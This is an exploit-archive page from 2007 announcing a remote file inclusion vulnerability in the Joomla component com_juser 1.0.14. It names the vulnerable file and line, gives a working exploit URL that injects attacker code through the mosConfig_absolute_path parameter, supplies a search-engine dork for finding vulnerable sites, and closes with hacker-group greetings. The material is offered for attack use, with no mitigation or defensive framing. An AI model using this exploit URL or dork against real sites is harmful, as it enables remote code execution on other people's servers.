Joomla Component JUser 1.0.14 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component JUser 1.0.14 Remote File Inclusion Vulnerability
# Published : 2007-11-19
# Author : NoGe
# Previous Title : Flatnuke 3 Remote Cookie Manipoulation / Privilege Escalation
# Next Title : VigileCMS 1.4 Multiple Remote Vulnerabilities

==================================================================================================================================

# JUser Joomla Component 1.0.14 Remote File Include Vulnerability

    Component     : com_juser version 1.0.14 - paid component
    Vendor        : www.joomlaequipment.com
    Discovered by : NoGe
    Contact       : pace[dot]noge[at]hotmail[dot]com
  
==================================================================================================================================

# Vulnerable file
  
    /administrator/components/com_juser/xajax_functions.php

    line 4 require ($mosConfig_absolute_path.'/administrator/components/com_juser/xajax/xajax_core/xajax.inc.php');



# Exploit

    http://localhost/path/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=[evilcode]



# D0rk

    inurl:com_juser

==================================================================================================================================

# Greetz

    all crew #papuahacker #baliemhackerlink #nyubicrew
    skulmatic OLiBekaS ulga Cungkee nyubi k1tk4t str0ke newbie
    yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ haliq
    http://kapukvalley.net member

==================================================================================================================================

# www.Syue.com [2007-11-19]